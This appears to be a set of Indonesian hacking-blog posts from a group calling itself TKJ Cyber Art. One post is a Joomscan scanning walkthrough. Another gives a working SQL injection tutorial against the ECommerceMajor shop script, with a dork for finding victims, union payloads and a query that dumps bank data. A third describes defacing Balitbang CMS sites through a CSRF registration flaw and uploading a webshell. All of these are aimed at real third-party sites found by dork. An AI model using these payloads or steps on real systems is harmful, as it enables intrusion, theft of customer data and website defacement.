Tutorial Mencari Vulnerability CMS Joomla dengan Joomscan

Hello World ; Malamm Fans, Please Say Hello Haters ;*
xixixhihi, kali ini gua bakal Share salah satu Tool Scanner yang berguna utk Scanning Bug2 yang ada di Website berCMS Joomla
sebenernye sih ini Tool Scanner lawas, kali aja msh crotz
yupz, Nue bakal Share Tutorial Mencari Celah (Vulnerability) CMS Joomla dengan Joomscan .
Kali ini gua praktekinnya di Kali Linux, silahkan coba di Distro2 Linux kesayangan anda :p

Untuk membuka dan melihat opsi yang ada pada joomscan, ketikkan pada terminal

joomscan

Terus kite update terlebih dahulu untuk memeriksa dan memperbarui database lokal joomscan jika versi yang lebih baru tersedia, gunakan perintah

joomscan update

Selanjutnya untuk melakukan scanning, perintahnya cukup mudah, seperti dibawah ini

joomscan -u target.cr0tz

Dan tunggu hingga prosses selesai ...

Screenshot dibawah menunjukkan terdapat 1 buah vulnerable dengan keterangan YES, di sana juga diberikan link mengenai exploit tersebut.

Pada screenshot selanjutnya menunjukkan keterangan NO dan N/A artinya tidak vuln atau tidak tersedia

Dari hasil scanning yang telah selesai dilakukan, joomscan menunjukkan terdapat 1 vulnerable pada website tersebut, selanjutnya silahkan di praktekkan sendiri agar lebih tau fungsi dar tools joomscan ini.

Maaf bila Gua jarang Update >..< , lagi prepare jemput MasaDepan nih #anjaay 8|

owh iya, Bila ada Link atau gambar pada Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Joomla Hacked ~
Sekian dan semoga bermanfaat .. terimakasih

source and thanks to: anherr Blog's

Maq Lo yang leet aja gak songong ajg

Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM      : C0018D1A2

Line       : http://line.me/ti/p/%40hjl8740i

ECommerceMajor SQL Injection Vulnerability

Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Website dengan eXploit ECommerceMajor SQL Injection Vulnerability.

cielahh kalo baca/ denger kata yang berbau E-Commerce biasanya para kardiman pada merapat nih awkkw.
yoi E Commerce Major ini salah satu platforms utk online business, kemungkinan besar semua website online shop :D

hadeh dump dump dump akwkkakw.
Happy Injector, kuy langsung disimak.

#Exploit Author : Rahul Pratap Singh

#Date           : 13/Dec/2015

#Home page Link : https://github.com/xlinkerz/ecommerceMajor

#Website        : 0x62626262.wordpress.com

#Linkedin       : https://in.linkedin.com/in/rahulpratapsingh94

Dork : inurl:/productdtl.php site:.

eXploit : productdtl.php?prodid=<SQLI>

1. pertama kita cari target menggunakan dork diatas.
Setelah kita mendapatkan target, lakukan tes untuk mengetahui vuln atau tidak menggunakan ‘
contoh : 127.0.0.1/productdtl.php?prodid=1’

2. coba kita balance dengan +--+
contoh :  127.0.0.1/productdtl.php?prodid=1+--+

3. jika halaman menjadi seperti semula, berarti balance sukses

coba kita menghitung jumlah column nya dengan menggunakan order by

contoh :  
127.0.0.1/productdtl.php?prodid=1+order+by+1--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+2--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+3--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+10--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+11--+ → error, berarti jumlah columnnya 10.

sekarang kita cari angka ajaibnya menggunakan union select

contoh :
127.0.0.1/productdtl.php?prodid=-1+union+select+1,2,3,4,5,6,7,8,9,10--+

4. nah angka ajaibnya muncul, sekarang kita dump menggunakan DIOS nya mas madblood

contoh: 127.0.0.1/productdtl.php?prodid=1+productdtl.php?prodid=-2+union+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10--+

5. nah muncul kan? Tuh liat ada data bank juga xixixixi
sekarang kita coba dump lagi data datanya xixixix

contoh :
127.0.0.1/productdtl.php?prodid=-2+union+select+1,group_concat(bnk_title,0x3a,bnk_name,0x3a,bnk_br,0x3a,bnk_city),3,4,5,6,7,8,9,10 from cp_info--+

tuh keluarkan data datanya? Xixixix

Artikel Tutorial yang ada diBlog ini hanya untuk pembelajaran ya kak, jadi segala perbuatan yang Lu lakukan, semua di tanggung sang pembaca.
Kami tidak bertanggung jawab setidikpun, kami Hanya membantu para pembaca yang pemula seperti kami, jadi jangan banyakin Drama gak jelas wkwkwk.
Kalo ada pertanyaan silahkan ke fanspage atau Official Account Line kami.

happy hacking SQL Injection guys :)

3xBitCh

Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM      : C0018D1A2

Line       : http://line.me/ti/p/%40hjl8740i

Deface Website CMS Balitbang dengan CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)

Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Website CMS Balitbang dengan CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3).
yoii kali ini ini adalah Bug lama pada CMS Balitbang yang memanfaatkan Register Member, yaa walaopun ini bug lama, tpi di Blog ini belum ada artikelnya.
utk Domisili DKI Jakarte, gimana dah kelar kan nyoblosnya ? semoga gak ada argumen2 basi lagi soal pilkada di beranda Facebook.

Exploded or exploDead o.O? #Enjoyed
Editing by: OepilCore

Dork : inurl:/materi/ tim balitbang site:.

eXploit: /member/daftar.php

Auto Exploit : Auto eXploit CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)

Source Code: [PHP] CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)

1. pertama silahkan cari target yang ingin di eksekusi

2. Lalu Masukan eXploit ke Link target, apakah muncul Form Register Member atau tidak.
contoh: www.target.c0li/member/daftar.php
jika muncul form Register Member berarti web Vuln.

3. Upload Source Code [PHP] CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3) ke Hosting / webshell yang sudah anda tanami shell sebelumnye.
Nb : nama exploit wajib test.php :)    

atau Bisa gunakan auto eXploit yang sudah kami sediakan: Auto eXploit CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)

4. Buka exploit nya, isi data datanya

5. Jika sudah klik next, Maka akan muncul kolom baru

6. Isi captcha nya, lalu klik go, nanti akan muncul di kolom target

7. Jika sudah klik kolom klik disini

8. Maka akan muncul validasi membernya, lalu klik kolom lewat sini brade!!

9. Klik kolom klik disini untuk bikin session, jika yes, kita coba upload shell dengan ekstensi phtml
Jika muncul seperti di ss biasanya sudah terupload, coba cek shellnya

Jika kurang jelas bisa lihat vidionya di https://www.youtube.com/watch?v=NG-67OnoBTo
untuk Deface Dengan CSRF Balitbang: KLIK DISINI

Karena ini CMS buatan anak bangsa, dan lekat sekali dengan web2 berdomain .id, jadi di usahakan jangan ngindek ya kimak.

Like, Comment, and Subscribe Channel Baru Kami: BadSector Channel

Oke sekian tutorial cupu dari saya :)

3xBitCh

Sange kok gak Modal #3xBitCh

Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM      : C0018D1A2

Line       : http://line.me/ti/p/%40hjl8740i